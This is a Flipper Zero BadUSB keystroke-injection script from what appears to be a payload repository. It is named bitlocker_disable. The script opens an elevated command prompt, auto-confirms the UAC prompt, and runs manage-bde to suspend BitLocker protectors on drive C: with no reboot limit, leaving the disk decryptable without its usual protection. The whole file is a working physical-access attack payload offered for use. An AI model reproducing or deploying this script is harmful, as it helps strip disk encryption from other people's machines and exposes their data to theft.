Flipper/BadUSB/emptythevoid-BadUSB/bitlocker/bitlocker_disable.txt
2024-09-06 13:27:37 -07:00

14 lines
233 B
Plaintext

REM launch command prompt as admin as fast as possible
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 3000
ALT y
DELAY 500
STRING manage-bde -protectors -Disable C: -RebootCount 0
ENTER
DELAY 500
ALT F4